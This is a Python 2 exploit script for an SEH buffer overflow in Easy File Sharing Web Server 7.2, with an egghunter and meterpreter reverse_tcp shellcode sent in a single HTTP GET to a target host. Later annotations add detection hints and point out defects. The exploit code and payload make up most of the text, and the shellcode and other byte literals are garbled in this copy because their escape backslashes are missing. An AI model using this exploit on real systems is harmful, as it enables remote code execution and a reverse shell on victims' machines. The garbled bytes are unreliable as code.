Easy File Sharing Web Server 7.2 SEH Buffer Overflow
Posted on 03 September 2016
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter)
# Date: 2016/8/31
# Exploit Author: Iran Cyber Security Group
# Vendor Homepage: http://www.sharing-file.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2 [LATEST]
# Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems]
# CVE : N/A
# Usage : python exploit.py [IP or Domain]
# Discovered By Arash Khazaei (AKA XoDiAK)
# Greetz To Iran Cyber Members & My Friends
"""Proof-of-concept for an SEH overflow in Easy File Sharing Web Server 7.2.

What the script does (as written below): it opens one TCP connection to
port 80 of the host given as the first command-line argument, sends a
single HTTP ``GET`` whose request-target is a ~4 KB run of ``A`` followed
by binary bytes, closes the socket, and never reads a response.

Notes for defenders reading this listing:

* Detection: the only traffic is one GET with an abnormally long
  request-URI (4061 ``A`` bytes plus non-printable bytes, no ``Host``
  header, ``HTTP/1.0``).  A request-URI length threshold or a rule on
  long runs of a single repeated byte in the URI covers it.
* This copy is Python 2 (``print`` statement) and the backslashes of the
  ``\\x..`` escapes did not survive extraction, so the byte-string
  literals below are plain ASCII text in this listing.
* The request terminator after ``HTTP/1.0`` also appears to have been
  lost in this copy (only a space remains).
"""

import sys,socket
from struct import pack

# sys.argv[1] is read unconditionally: running with no argument raises
# IndexError before anything is sent.
HOST = sys.argv[1]
# Target port is fixed; the service is assumed to be the HTTP listener.
PORT = 80

# msfvenom -p windows/meterpreter/reverse_tcp -b 'x2fx5c' -i 2 -f c 335 Byte
# Replace It With Your Own Shellcode !
# The leading "w00tw00t" is the 8-byte tag the egghunter below searches for;
# the remaining literals are the generated payload and are opaque here.
shellcode = ("w00tw00t" + "xd9xc9xbfx35xfex35x6exd9x74x24xf4x5ex29xc9xb1"
"x4ex31x7ex17x83xc6x04x03x4bxedxd7x9bx6axffxc1"
"x10xa8xf4xa8xf1x79x4bx8dxf4xcfx36xbfxbex1ex4d"
"xd8x43x1axa9x5bx81x1fxddx18x78xb2x84x32xfbx61"
"x03x6fx9exe5x0fx3dx70x9bxbbxd1x2ex81x1cxa6x79"
"x74x27x17xdex04x4bx10x89x6bxd3xe4xc0x6cx47x32"
"xf4x44xebx7ex1exd7x62x4cx56x0fx58x2ex1ax12xc9"
"x0ex12x81x30xc9x30x3cx76xc0x7axc0xe0x3bxbax6f"
"xfcx5bxe3x3fx1cxa6x37x3dxf5x6bxf3x1axe0x82x85"
"xc8xeexcexc8xa2xf9x0ex84xe3xacx36xe6x3bxc0xe7"
"x61xc1xd3xefxf1x4exc3xdexfdxc7x77x5bx51xbcxab"
"x2dxb9x65x03xc1x01x47xbex50xe2xfcx96x96xabxd3"
"xf8x53x15x69xc6xcdx34xdbxd3xcdxccxddx02x24x31"
"x9fxc0xcex41x53xf0xe0xb1xd7x96xfcx16xe4x10xba"
"xd0xd0x10x02x40xdcx33x9dxb5x35xbbx3fx4fx93x11"
"x9ax16x63x1bx60xa1xabx5ex05xf2x7cx02x57x99x90"
"x88x4dxcfx60x3ax9fx77x8ax9exffx1cx91x61xecx5e"
"xd4x08x54x76xfbxdbx45xdax8fx01xbaxedx01xefx09"
"xc1x5dx8fx2bx24x69xc0xbfx44x03x6ex62x7cx39x6a"
"xabx18x70xe5xffxe6x33x3bx2bx37xf1xb3x92xd6x59"
"xccxc8xcax8dx9dx34xf9x89xf7x26xbcx60xa1xdfxcb"
"xa8x9dxd2x9fx33x5ax48xb2x8dxc5xaax9fx3cx37x0b"
"x98x35x70x3bxe0")

# Padding !
# 4061 bytes of 'A' fill the buffer up to the SEH record; this run is the
# most visible on-the-wire signature of the request.
junk = "A" * 4061
# Next SEH
nseh = "xebx06x90x90"
# 0x1000108b [ImageLoader.dll] POP POP RET
# NOTE(review): the address in the comment above (0x1000108b) does not match
# the value actually packed on the next line (0x10018848); the listing does
# not say which one the author intended.
seh = pack('<L', 0x10018848)
# Egg Hunter 32 Byte Tag = w00tw00t
egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7")

# The trailing pad evaluates to the empty string: len(junk) is 4061 and
# 4061 - 4 - 4 - 32 - 8 - 335 - 5000 is negative, and a negative repeat
# count yields "".  The request-target is therefore exactly
# junk + nseh + seh + egghunter + shellcode.
exploit = junk + nseh + seh + egghunter + shellcode + "x90"*(len(junk)-4-4-32-8-335-5000)

try:
    # One connection, one write, no read: the script does not check whether
    # the server accepted or answered the request.
    s = socket.socket()
    s.connect((HOST, PORT))
    s.send("GET " + exploit + " HTTP/1.0 ")
    s.close()
except:
    # Bare except: this also swallows KeyboardInterrupt and any error raised
    # by send(), not only connection failures, and it does not exit.
    print "Can't Connect To Web Server ! Is it up ?"

# Printed unconditionally, including after the except branch above ran, so
# this message is not evidence that anything was delivered.
print "Evil Buffer Sended Successfully!"